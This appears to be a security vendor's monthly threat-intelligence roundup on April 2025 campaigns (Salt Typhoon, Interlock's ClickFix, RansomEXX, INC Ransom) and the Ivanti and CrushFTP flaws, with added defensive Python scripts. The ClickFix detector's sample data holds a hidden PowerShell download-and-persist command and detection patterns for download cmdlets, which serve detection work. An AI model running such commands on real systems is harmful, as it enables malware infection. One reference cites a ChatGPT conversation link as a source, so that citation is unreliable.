Sıla Özeren | 17 MIN READ

CREATED ON May 08, 2025

Interlock’s ClickFix Trick: One Click, Total Data Compromise

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

Top Threat Actors Observed in the Wild: April 2025

Here are the most active threat actors that have been observed in March in the wild.

FBI Calls for Help to Unmask Salt Typhoon – Chinese Telecom Espionage Group

  • Victim Location: United States (nationwide telecoms) and global targets across Europe, Africa, and Asia

  • Sectors: Telecommunications providers, Internet Service Providers (ISP), government networks (via telecom infrastructure)

  • Threat Actor: Salt Typhoon – Chinese state-sponsored cyber-espionage group (aka GhostEmperor, FamousSparrow, UNC2286).

  • Actor Motivations: Espionage (intelligence collection from communications infrastructure)

  • Tools & Techniques: Stolen credentials and living-off-the-land persistence on network devices; exploitation of Cisco IOS XE router flaws (e.g. CVE-2023-20198, CVE-2023-20273); custom malware “JumbledPath” for stealthy traffic monitoring.

Salt Typhoon has been conducting prolonged intrusions into telecom networks, enabling Beijing-linked hackers to covertly monitor communications on a massive scale. In late 2024 and early 2025, the group breached multiple major U.S. telecom carriers (AT&T, Verizon, Lumen, and others), even accessing a U.S. law enforcement wiretap system and intercepting “private communications” of a few government officials [1]. Despite exposure of these activities, Salt Typhoon continued its campaign into 2025: between December 2024 and January 2025 the group compromised additional telecom firms in the U.S., Europe (Italy, UK), Africa (South Africa), and Asia (Thailand) by exploiting known vulnerabilities in Cisco IOS XE network devices. The attackers used a 2018-era Cisco bug (Smart Install exploit) and two 2023 router privilege escalation and command injection flaws to create backdoor accounts and run malicious code on unpatched routers.

Once inside, Salt Typhoon operatives showed exceptional persistence, in some cases maintaining covert access for 3+ years in critical networks. They rely on valid credentials and native admin tools (avoiding malware on endpoints) to remain stealthy, but have deployed a bespoke implant called JumbledPath to monitor network traffic and siphon data from compromised telecom equipment.

In April, the FBI issued a public PSA seeking information to unmask the individuals behind Salt Typhoon [2], underscoring the campaign’s severity. U.S. authorities even sanctioned a Chinese tech firm for assisting these intrusions. Salt Typhoon’s wide-reaching espionage operations highlight the high stakes of unprotected infrastructure – telecom backbones and network gear have become prime targets for state-sponsored hackers intent on wiretapping the world.
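The two conditions the Salt Typhoon write-up turns on, an exposed IOS XE web UI (the feature that CVE-2023-20198 affects) and backdoor local accounts created on the router, are both visible in a running-config. The script below is an added example, not code from the Picus post or from Cisco: it audits a running-config for those two signals. The sample config, the allowlist of known accounts and the hostnames are constructed for illustration.

```python
"""
Added example (not from the Picus post): audit a Cisco IOS XE running-config
for an enabled web UI (ip http server / ip http secure-server) and for local
accounts that are not on the organisation's allowlist, the two signals the
Salt Typhoon summary above describes. All sample data is constructed.
"""
import re

# Constructed sample running-config; "cisco_tac_admin" is the kind of
# unexpected privilege-15 account a defender would want flagged.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
username netops privilege 15 secret 9 $9$placeholder
username cisco_tac_admin privilege 15 secret 9 $9$placeholder
username readonly privilege 1 secret 9 $9$placeholder
!
ip http server
ip http secure-server
!
line vty 0 4
 transport input ssh
!
"""

# Accounts the organisation approved (assumed allowlist for the example).
KNOWN_USERS = {"netops", "readonly"}

# "username <name> [privilege <n>] ..."; IOS defaults privilege to 1 when absent.
USER_RE = re.compile(r"^username\s+(\S+)(?:\s+privilege\s+(\d+))?")


def audit_config(config: str, known_users: set) -> dict:
    """Return web UI exposure flags and local accounts missing from the allowlist."""
    findings = {"http_server": False, "https_server": False, "unknown_users": []}
    for raw in config.splitlines():
        line = raw.strip()
        if line == "ip http server":
            findings["http_server"] = True
        elif line == "ip http secure-server":
            findings["https_server"] = True
        m = USER_RE.match(line)
        if m:
            user, priv = m.group(1), int(m.group(2) or 1)
            if user not in known_users:
                findings["unknown_users"].append((user, priv))
    return findings


def risk_summary(findings: dict) -> list:
    """Human-readable findings; unknown privilege-15 accounts are the loudest signal."""
    out = []
    if findings["http_server"] or findings["https_server"]:
        out.append("web UI enabled: disable or restrict it if not required, and patch")
    for user, priv in findings["unknown_users"]:
        level = "PRIVILEGED" if priv >= 15 else "low-priv"
        out.append(f"{level} local account not on allowlist: {user}")
    return out


if __name__ == "__main__":
    for finding in risk_summary(audit_config(SAMPLE_CONFIG, KNOWN_USERS)):
        print(finding)
```

Run it against `show running-config` output collected out-of-band from each device; an unknown privilege-15 user plus an enabled web UI on the same box is the combination to escalate first.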

UNC5174: Stealthy Chinese APT Deploys VShell RAT for Defense Sector Spying

  • Victim Location: Primarily United States, United Kingdom, Canada; also Asia-Pacific NGOs

  • Sectors: Defense contractors, Government agencies, Think tanks, Critical infrastructure (energy, healthcare).

  • Threat Actor: UNC5174 – Chinese state-sponsored APT (identified by Mandiant; believed to be government contractors).

  • Actor Motivations: Espionage (stealing defense and policy intelligence)

  • Malware & TTPs: Custom backdoors (Snowlight implant [3], Silver malware) plus open-source VShell RAT for command-and-control; exploitation of known web server vulnerabilities (e.g. F5 BIG-IP and ScreenConnect flaws) for initial access.

UNC5174 is a highly stealthy Chinese espionage group that came to light in April 2025 for its adept use of open-source tools to blend into targets’ networks. Active through at least April, this group has been targeting Western defense and government organizations – including U.S. military contractors, government agencies, research institutes, and tech companies – as well as NGOs in Asia-Pacific, all aligned with Chinese intelligence priorities [4]. Investigations revealed UNC5174 leveraging public hacking frameworks and living-off-the-land techniques to avoid detection. Notably, the group deploys a previously unknown remote access Trojan dubbed VShell, an open-source backdoor similar to Cobalt Strike, as a secondary in-memory implant to maintain persistence on compromised machines. They pair this with a custom malware family called Snowlight (uncovered by Mandiant) and a “Silver” implant, giving them multiple footholds in victim networks.

To gain initial entry, UNC5174 exploits internet-facing applications; for example, reports indicate they targeted unpatched F5 BIG-IP (CVE-2022-1388) and ConnectWise ScreenConnect remote support flaws, allowing them to breach perimeter systems and drop malware [5]. Once inside, they operate quietly, using legitimate admin tools and scripts (e.g. scheduled tasks, PowerShell) to move laterally and collect data, thereby “blending in” with normal operations. UNC5174’s activity in April shows a continuation of Chinese cyber-espionage focusing on defense and critical infrastructure. Their use of an open-source RAT and “fileless” malware in memory makes attribution and detection difficult. Nonetheless, intelligence agencies assess with high confidence that this is a state-backed operation intended to steal sensitive military and policy information, a strategic threat to Western national security.

Interlock Ransomware: ClickFix Attacks and Healthcare Data Extortion

  • Victim Location: United States (notably a Fortune-500 healthcare provider); also targeting organizations in Europe (observed since late 2024)

  • Sectors: Healthcare (dialysis clinics), Education and Public Sector (e.g. school systems), Corporates using common IT tools

  • Threat Actor: Interlock – Ransomware gang active since Sept 2024 (independent operation with its own leak site, not a RaaS affiliate model).

  • Actor Motivations: Financial gain (data theft and double-extortion ransomware)

  • Techniques & Malware: ClickFix social engineering lures (fake IT support pages triggering PowerShell); initial payloads installing info-stealers (e.g. LummaStealer, Berserk malware) and a custom Interlock RAT; lateral movement via RDP and admin tools, followed by Interlock ransomware deployment

Interlock is an emerging ransomware threat group that made headlines in April 2025 for its brazen attack on a major healthcare company and its inventive intrusion technique. On April 12, DaVita Inc., a U.S. kidney dialysis firm, suffered a ransomware attack that disrupted operations. By April 24, the Interlock gang claimed responsibility, posting DaVita’s name on its dark web leak site and leaking ~1.5 TB of data (including patient records and financial info) after ransom negotiations failed [6]. This incident highlights Interlock’s double-extortion approach: encrypting systems and stealing sensitive data to pressure victims into paying.

Beyond high-profile victims, Interlock has been noted for using a novel social engineering tactic dubbed ClickFix [7]. In ClickFix attacks, the hackers impersonate IT troubleshooting tools or verification prompts to trick users into executing malicious commands. For example, researchers reported that Interlock set up fake webpages mimicking Microsoft Teams or the popular Advanced IP Scanner utility, which displayed a “Press Fix It to resolve an issue” message. When unwitting users followed the instructions (copy-pasting a provided command into their console), a hidden PowerShell command was run – downloading a 36 MB payload packaged with malware. The attack is devious: the user sees the legitimate application open (to allay suspicion) while in the background a malicious PowerShell script executes invisibly. This script establishes persistence (via a Run key) and immediately harvests system information (OS version, running processes, etc.), sending it to Interlock’s command-and-control server. The server can then respond with additional payloads; analysts observed it delivering credential stealers like LummaStealer, keyloggers, and the group’s own lightweight Interlock RAT.

Once the RAT is running, Interlock operators use the foothold to move laterally across the network. They have been seen exploiting stolen credentials and using remote admin tools (RDP, PuTTY, AnyDesk, LogMeIn) to spread to other systems. Finally, they deploy the file-encrypting ransomware to lock victim data and drop ransom notes. Interlock’s leak site indicates ransom demands ranging from hundreds of thousands up to millions of dollars. The combination of clever phishing (ClickFix) and traditional post-exploitation techniques makes Interlock a dangerous mid-tier ransomware actor to watch. Their attack on a healthcare giant in April also underscores the human cost of such attacks (impacting patient services) and the need for organizations to harden user-awareness and patch management to thwart the initial intrusions.
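The ClickFix chain described above leaves a recognisable shape in endpoint telemetry: a PowerShell process started from the user's shell with its window hidden, a download cmdlet in the command line, and shortly afterwards a Run-key value written by that same process. The detector below is an added example, not code from the Picus post or from Interlock; it scores process-creation events on those cues and ties Run-key writes back to flagged processes. The event schema, the field names, the assumption that the pasted command is launched from explorer.exe, and every sample value (including the 198.51.100.7 documentation-range address) are constructed for illustration.

```python
"""
Added example, not code from the Picus post or from Interlock: a detector for
the ClickFix chain described above (hidden PowerShell launched by a user,
payload download, Run-key persistence), run over constructed telemetry.
Event field names, the parent-process assumption and all sample values are
illustrative; map them onto your own EDR or Sysmon schema.
"""
import re

# Constructed telemetry: a benign scripted PowerShell run, a ClickFix-style
# hidden download launched from the user's shell, and a Run-key write by
# that same process. 198.51.100.7 is a documentation-range placeholder.
EVENTS = [
    {"type": "process", "pid": 4410, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1", "user": "CORP\\svc_backup"},
    {"type": "process", "pid": 5120, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iwr http://198.51.100.7/fix.zip "
                "-OutFile $env:TEMP\\fix.zip\"",
     "user": "CORP\\jdoe"},
    {"type": "registry", "pid": 5120, "image": "powershell.exe",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "data": "powershell -w hidden -File C:\\Users\\jdoe\\AppData\\Local\\Temp\\fix.ps1"},
]

# Cues the post's description turns on: a window kept hidden from the user,
# a download/execute cmdlet, and a launch from an interactive shell.
HIDDEN_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)", re.I)
DOWNLOAD_CUES = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
INTERACTIVE_PARENTS = {"explorer.exe"}  # assumption: pasted command is run from the shell


def score_process(ev: dict) -> int:
    """Weight the cues; a plain scripted run scores 0, the ClickFix pattern scores high."""
    cmd = ev["cmdline"]
    score = 0
    if HIDDEN_FLAGS.search(cmd):
        score += 2
    if DOWNLOAD_CUES.search(cmd):
        score += 2
    if ev["parent"].lower() in INTERACTIVE_PARENTS:
        score += 1
    return score


def detect(events: list, threshold: int = 4) -> list:
    """Flag suspicious PowerShell launches, then tie Run-key writes back to them."""
    flagged = {}
    findings = []
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower() == "powershell.exe":
            s = score_process(ev)
            if s >= threshold:
                flagged[ev["pid"]] = ev
                findings.append(
                    f"pid {ev['pid']} ({ev['user']}): hidden PowerShell download "
                    f"launched from {ev['parent']} (score {s})")
        elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
            if ev["pid"] in flagged:
                findings.append(
                    f"pid {ev['pid']}: Run-key persistence by flagged process: {ev['key']}")
            else:
                findings.append(f"pid {ev['pid']}: Run-key write, review: {ev['key']}")
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The scoring keeps ordinary scripted PowerShell (no hidden window, no download cmdlet, not launched from the shell) below the threshold, while the Run-key correlation is what turns a noisy "PowerShell downloaded something" alert into a persistence finding worth paging on.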

RansomEXX (Storm-2460) – Ransomware Gang Exploits Windows Zero‑Day

  • Victim Location: North & South America, Europe, Middle East (confirmed in USA, Venezuela, Spain, Saudi Arabia).

  • Sectors: IT services and Real Estate (U.S.), Financial (Venezuela), Software (Spain), Retail (Saudi).

  • Threat Actor: RansomEXX – Sophisticated ransomware group (tracked by Microsoft as Storm-2460)

  • Actor Motivations: Financial (targeted ransomware extortion)

  • Tools & Exploits: PipeMagic backdoor for initial access; Windows Common Log File System (CLFS) zero-day exploit (CVE-2025-29824) for privilege escalation; RansomEXX ransomware payload for encryption

In April 2025, Microsoft alerted organizations that the RansomEXX ransomware gang had been actively using a Windows zero-day vulnerability to carry out a string of targeted attacks [8]. The flaw in question – CVE-2025-29824 – is a use-after-free bug in the Windows CLFS component that allows a local attacker to elevate privileges to SYSTEM level [9]. RansomEXX operators took advantage of this bug (prior to a patch being available) as part of their attack chain to fully compromise victim machines. Microsoft rushed a fix for CVE-2025-29824 in the April 2025 Patch Tuesday updates and noted that, fortunately, the zero-day had been exploited only in a limited number of attacks in the wild.

Those attacks, however, were globally distributed and highly targeted. According to Microsoft’s investigation, RansomEXX targeted a diverse set of victims: IT and real estate firms in the United States, a financial institution in Venezuela, a software company in Spain, and a retail business in Saudi Arabia. In each case, the attackers first established access and dropped a custom backdoor (dubbed PipeMagic). PipeMagic was then used to deploy the CLFS exploit on the infected system, which in turn allowed the attackers to disable security controls and execute the ransomware with SYSTEM privileges. Once RansomEXX encrypted the files, it left behind its hallmark ransom note (!_READ_ME_REXX2_!.txt) instructing the victim to use a Tor link to contact the attackers.

One notable detail is that systems running the very latest Windows 11 builds were apparently not affected by the exploit, possibly due to exploit mitigations, whereas older Windows versions were vulnerable. Microsoft publicly attributed this campaign to the known RansomEXX group (which they track as Storm-2460) and urged all organizations to apply the April patches immediately. The incident is a textbook example of ransomware actors weaponizing zero-day vulnerabilities. By using an unknown exploit, RansomEXX was able to bypass many defenses (since no antivirus signature or IDS rule existed for the new exploit) and hit high-value targets. This development aligns with a growing trend of ransomware gangs adopting APT-like tactics, employing sophisticated exploits traditionally seen only in nation-state operations. It also reinforces the importance of keeping systems updated – in this case, organizations that delayed patching or ran legacy Windows versions were at much greater risk of compromise.

INC Ransom – New Extortion Group Hits U.S. Retail & Legal Entities

  • Victim Location: United States (multiple states)

  • Sectors: Retail & Wholesale (grocery chain operations), Legal (state bar association), Healthcare (hospital systems)

  • Threat Actor: “INC Ransom” – Emerging ransomware/extortion gang (possibly a rebrand of an existing crew, referenced by Microsoft as part of Vanilla Tempest)

  • Actor Motivations: Financial (data theft and extortion, double-extortion attacks)

  • Modus Operandi: Data breaches followed by public leak site disclosure; focus on U.S. targets in 2024–2025; opportunistic exploitation of unpatched systems and third-party compromises (investigations ongoing)

INC Ransom gained notoriety in April 2025 through a series of brazen data breach disclosures. One of the group’s highest-profile victims is Ahold Delhaize, a global food retail giant (owner of Food Lion, Stop & Shop, Giant, etc.). Ahold Delhaize suffered a cyber incident in November 2024 that forced some IT systems offline [10]. At the time, the company did not confirm ransomware involvement. However, on April 16, 2025, INC Ransom added Ahold Delhaize to its dark web leak portal, posting samples of documents allegedly stolen from the company. In response, Ahold Delhaize publicly confirmed that certain files had been taken from its U.S. systems during the November attack (i.e. a data breach did occur). The leaked data is believed to include internal business records, though the full impact (e.g. customer data exposure) was still under investigation [10]. The incident shows INC Ransom’s willingness to target large enterprises and sit on exfiltrated data for months, only to use it later for extortion once they establish their leak site.

Although not occurring in April, the State Bar of Texas reported unauthorized access to its network during Q1 2025, specifically between January 28 and February 9, with the breach discovered on February 12 [11]. The Bar notified its approximately 100,000 members that hackers—identified as INC Ransom—had breached their systems and stolen sensitive personal data [12]. This suggests the group’s focus on U.S. entities spans multiple industries, having already impacted retail, legal, and, according to other reports, healthcare as well. Microsoft’s security teams have been tracking an INC Ransom affiliate under the codename “Vanilla Tempest,” noting that this actor has recently launched aggressive attacks on U.S. healthcare providers. It’s possible that INC Ransom is a spin-off or rebranding of a previously known ransomware group that has shifted its tactics. The group’s leak site and extortion methods resemble those of other gangs, but definitive attribution is still under investigation.

Organizations in the U.S. are advised to stay vigilant, as INC Ransom has been targeting entities with potentially weaker cybersecurity, and then leveraging the publicity of leak sites to maximize pressure. Proactive threat hunting, network monitoring, and prompt breach disclosure (when incidents occur) can help mitigate the impact of such extortion attempts.

Latest Vulnerabilities and Exploits in April 2025

In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.

Ivanti Zero-Day (CVE-2025-22457) – VPN Appliance Exploited by Chinese APT

  • Affected Vendor/Product: Ivanti (formerly Pulse Secure) – Connect Secure VPN appliances (versions 9.x and 22.7R2.5 and earlier)

  • Vulnerability: A critical buffer overflow in the VPN web interface enables unauthenticated remote code execution.

  • Discovery/Exploitation: Publicly disclosed on April 3, 2025; actively exploited since mid-March by a suspected Chinese state-aligned group tracked as UNC5221.

  • Patch & Mitigation: Ivanti released a patch in version 22.7R2.6 on February 11, 2025. CISA and Ivanti have issued urgent advisories recommending immediate upgrades due to confirmed in-the-wild exploitation.

A critical zero-day in Ivanti’s VPN platform emerged as one of the most alarming exploits in early April. CVE-2025-22457 is a buffer overflow vulnerability in Ivanti Connect Secure (ICS) appliances, which provide remote access into corporate networks. Initially misclassified as a denial-of-service issue, the flaw was later found to allow full remote code execution. Threat actors reverse-engineered Ivanti’s February patch and began weaponizing the vulnerability on unpatched devices.

By mid-March, a Chinese APT group known as UNC5221 had begun exploiting the flaw in the wild, targeting vulnerable VPN gateways to deploy malware [13]. Researchers observed UNC5221 using the exploit to drop TRAILBLAZE (an in-memory dropper) and BRUSHFIRE (a stealth backdoor) onto compromised VPN appliances. The presence of SPAWN malware components—previously attributed to UNC5221—further confirmed the group’s involvement. Once the VPN appliance was backdoored, the attackers were able to pivot into internal networks, effectively bypassing perimeter defenses.

Ivanti quickly acknowledged the severity of the threat. On April 3, Ivanti published an official advisory, and CISA added CVE-2025-22457 to its Known Exploited Vulnerabilities (KEV) catalog, mandating remediation for federal agencies.

This case underscores a key lesson: even when a vulnerability is initially downplayed, attackers may still find ways to exploit it. Organizations using ICS appliances should ensure they have upgraded to version 22.7R2.6 or later and conduct thorough reviews of VPN logs for suspicious activity dating back to February or March. Since exploitation began before public disclosure, any delay in patching could leave systems exposed to highly capable threat actors. Thanks to prompt disclosure, the flaw’s inclusion in CISA’s KEV catalog likely helped prevent broader impact.
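The upgrade check above ("22.7R2.6 or later") is easy to get wrong by hand because Ivanti version strings mix a dotted release with an R-numbered build. The helper below is an added example, not Ivanti's tool or code from the Picus post: it parses those strings into comparable tuples and lists the appliances in an inventory that still sit below the fixed release. The grammar it accepts (major.minorR<release>.<patch>, e.g. 22.7R2.5 or 9.1R18.9) and the hostnames and versions in the inventory are assumptions for illustration; confirm edge cases against Ivanti's own advisory rather than this parser.

```python
"""
Added example, not Ivanti's tool or the post's code: triage an inventory of
Ivanti Connect Secure appliances against the fixed release named above
(22.7R2.6). The version grammar and the inventory are assumptions.
"""
import re

FIXED_VERSION = "22.7R2.6"  # fixed release per the advisory discussed above
# major.minor, optionally followed by R<release> and .<patch>
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:R(\d+)(?:\.(\d+))?)?$", re.I)

# Constructed inventory: hostname -> ICS version as reported by the appliance.
INVENTORY = {
    "vpn-east": "22.7R2.5",   # one release short of the fix
    "vpn-west": "22.7R2.6",   # fixed
    "vpn-lab": "9.1R18.9",    # legacy 9.x branch, listed as affected above
    "vpn-dr": "22.7R2.7",     # later than the fix
}


def parse_ics_version(s: str) -> tuple:
    """Turn '22.7R2.5' into (22, 7, 2, 5); absent R/patch parts become 0."""
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {s!r}")
    return tuple(int(g) if g else 0 for g in m.groups())


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the appliance runs anything older than the fixed release."""
    return parse_ics_version(version) < parse_ics_version(fixed)


def triage(inventory: dict) -> list:
    """Hostnames that still need the upgrade, sorted for the ticket."""
    return sorted(host for host, ver in inventory.items() if is_vulnerable(ver))


if __name__ == "__main__":
    print("upgrade required:", ", ".join(triage(INVENTORY)) or "none")
```

Because exploitation predated public disclosure, a host that shows up in the triage list also needs the VPN log review described above, not just the upgrade.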

CrushFTP Critical Flaw (CVE-2025-31161) – Authentication Bypass Abused

  • Affected Product: CrushFTP (enterprise file transfer server software): versions prior to 10.8.4 and 11.3.1

  • Vulnerability: An authentication bypass flaw in CrushFTP’s HTTP authorization handling allows unauthenticated attackers to impersonate any known user, such as the default "crushadmin" account, without credentials. This effectively gives full control of the server to the attacker.

  • Exploitation: Active exploitation was confirmed in the wild as early as March 30, 2025. By April 7, the vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. At least 1,500 internet-exposed instances were reported vulnerable, underscoring the urgency of mitigation.

  • Patch: CrushFTP released fixes in versions 10.8.4 and 11.3.1. All administrators should upgrade immediately. As a temporary mitigation, ensure management interfaces are not exposed to the internet or are protected by network ACLs.

A newly disclosed vulnerability in CrushFTP, a widely used enterprise file transfer server, was quickly weaponized by attackers in early April. CVE-2025-31161 is an authentication bypass flaw with a CVSS score of 9.8. By crafting a specific HTTP header, an attacker can trick the server into treating them as an authenticated admin user, allowing them to gain full access without valid credentials. This includes the ability to upload/download files, create new accounts, and possibly execute arbitrary code, depending on server configuration.

Following public disclosure, reports of exploitation began surfacing rapidly. Security researchers observed attackers deploying tools like MeshCentral and AnyDesk, creating persistent backdoor accounts, and even dropping malware to maintain long-term access. The scope of potential victims includes businesses, educational institutions, and possibly government agencies.

This incident highlights the high risk posed by vulnerabilities in file transfer software, which often handles sensitive data and sits at critical points in enterprise infrastructure. Organizations using CrushFTP should patch immediately and audit logs for any unusual access patterns, especially admin logins from unfamiliar IPs, dating back to late March. Admin interfaces should also be placed behind VPNs or firewalls to prevent direct exposure.
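The bypass described above yields sessions that look like ordinary successful admin logins, so the audit the post recommends comes down to three filters: successful logins, to an admin account, from an address outside the ranges your administrators actually use, on or after March 30. The script below is an added example, not CrushFTP's code or the post's: it applies those filters to constructed log lines. The line format (`<date> <time> LOGIN user=... ip=... result=...`), the trusted networks and the sample addresses are assumptions; CrushFTP's real log layout differs, so adapt the regular expression before pointing this at production logs.

```python
"""
Added example, not CrushFTP's code or the post's: flag successful admin
logins from untrusted addresses on or after the first confirmed exploitation
date (March 30, 2025). The log format and all sample values are constructed.
"""
import ipaddress
import re
from datetime import datetime

ADMIN_USERS = {"crushadmin"}  # the default admin account named above
# Assumed trusted admin source ranges for the example.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                ipaddress.ip_network("192.0.2.0/24")]
EXPLOITATION_START = datetime(2025, 3, 30)

# Constructed log format; adapt to the real CrushFTP layout before use.
LOG_RE = re.compile(r"^(\S+ \S+) LOGIN user=(\S+) ip=(\S+) result=(\S+)$")

# Constructed sample log: one pre-window trusted admin login, one admin login
# from an unknown address inside the window, one normal user, one more admin
# login from an unknown address.
SAMPLE_LOG = """\
2025-03-28 09:12:01 LOGIN user=crushadmin ip=192.0.2.10 result=OK
2025-03-31 02:14:07 LOGIN user=crushadmin ip=203.0.113.45 result=OK
2025-04-02 11:40:33 LOGIN user=alice ip=198.51.100.9 result=OK
2025-04-05 23:59:10 LOGIN user=crushadmin ip=198.51.100.77 result=OK
"""


def parse_line(line: str):
    """Parse one log line into a record, or None if it is not a login line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
        "user": m.group(2),
        "ip": ipaddress.ip_address(m.group(3)),
        "ok": m.group(4) == "OK",
    }


def is_trusted(ip) -> bool:
    return any(ip in net for net in TRUSTED_NETS)


def suspicious_admin_logins(log_text: str, since: datetime = EXPLOITATION_START) -> list:
    """Successful admin logins from untrusted addresses within the exposure window."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["ok"]:
            continue
        if rec["ts"] >= since and rec["user"] in ADMIN_USERS and not is_trusted(rec["ip"]):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in suspicious_admin_logins(SAMPLE_LOG):
        print(f"{h['ts']:%Y-%m-%d %H:%M:%S} admin login from untrusted {h['ip']}")
```

Each hit is a session to check for follow-on activity of the kind reported above (new accounts, uploaded tooling such as MeshCentral or AnyDesk), and the trusted-range list is the part most worth getting right, since a too-broad list hides exactly the logins you are looking for.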

References

[1] S. Özeren, “Salt Typhoon: A Persistent Threat to Global Telecommunications Infrastructure,” Dec. 20, 2024. Available: https://www.picussecurity.com/resource/blog/salt-typhoon-telecommunications-threat. [Accessed: Apr. 30, 2025]

[2] S. Gatlan, “FBI seeks help to unmask Salt Typhoon hackers behind telecom breaches,” BleepingComputer, Apr. 25, 2025. Available: https://www.bleepingcomputer.com/news/security/fbi-seeks-help-to-unmask-salt-typhoon-hackers-behind-telecom-breaches/. [Accessed: Apr. 28, 2025]

[3] T. Meskauskas, “SNOWLIGHT Malware (Mac),” Apr. 16, 2025. Available: https://www.pcrisk.com/removal-guides/32658-snowlight-malware-mac. [Accessed: Apr. 30, 2025]

[4] Cybersecurity Help s.r.o, “China-linked UNC5174 group resurfaces with sophisticated Linux malware campaign.” Available: https://www.cybersecurity-help.cz/blog/4682.html. [Accessed: Apr. 30, 2025]

[5] D. B. Johnson, “Chinese espionage group leans on open-source tools to mask intrusions,” CyberScoop, Apr. 15, 2025. Available: http://cyberscoop.com/chinese-espionage-group-unc5174-open-source-tools/. [Accessed: Apr. 30, 2025]

[6] A. Doyle, “Interlock Ransomware Gang Claims DaVita Cyberattack, Leaks 1.5TB of Stolen Data,” Daily Security Review, Apr. 25, 2025. Available: https://dailysecurityreview.com/security-spotlight/interlock-ransomware-gang-claims-davita-cyberattack-leaks-1-5tb-of-stolen-data/. [Accessed: Apr. 30, 2025]

[7] L. French, “Interlock ransomware evolves tactics with ClickFix, infostealers,” SC Media, Apr. 16, 2025. Available: https://www.scworld.com/news/interlock-ransomware-evolves-tactics-with-clickfix-infostealers. [Accessed: Apr. 30, 2025]

[8] “Website.” Available: https://chatgpt.com/c/6811be8d-73ec-800c-9114-bca9054660d0

[9] D. Jones, “Windows CLFS zero-day exploited in ransomware attacks,” Cybersecurity Dive, Apr. 09, 2025. Available: https://www.cybersecuritydive.com/news/windows-clfs-zero-day-exploited-ransomware/744878/. [Accessed: Apr. 30, 2025]

[10] S. Fadilpašić, “Food retail giant behind several major US supermarket brands confirms data stolen in major ransomware breach,” TechRadar pro, Apr. 18, 2025. Available: https://www.techradar.com/pro/security/food-retail-giant-behind-several-major-us-supermarket-brands-confirms-data-stolen-in-major-ransomware-breach. [Accessed: Apr. 30, 2025]

[11] B. Toulas, “Texas State Bar warns of data breach after INC ransomware claims attack,” BleepingComputer, Apr. 03, 2025. Available: https://www.bleepingcomputer.com/news/security/texas-state-bar-warns-of-data-breach-after-inc-ransomware-claims-attack/. [Accessed: Apr. 30, 2025]

[12] P. Bischoff, “Texas State Bar data breach leaks SSNs and financial info; ransomware gang claims responsibility,” Comparitech, Apr. 03, 2025. Available: https://www.comparitech.com/news/texas-state-bar-data-breach-leaks-ssns-and-financial-info-ransomware-gang-claims-responsibility/. [Accessed: Apr. 30, 2025]

[13] S. Özeren, “UNC5221’s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure,” Apr. 17, 2025. Available: https://www.picussecurity.com/resource/blog/unc5221-cve-2025-22457-ivanti-connect-secure. [Accessed: Apr. 30, 2025]
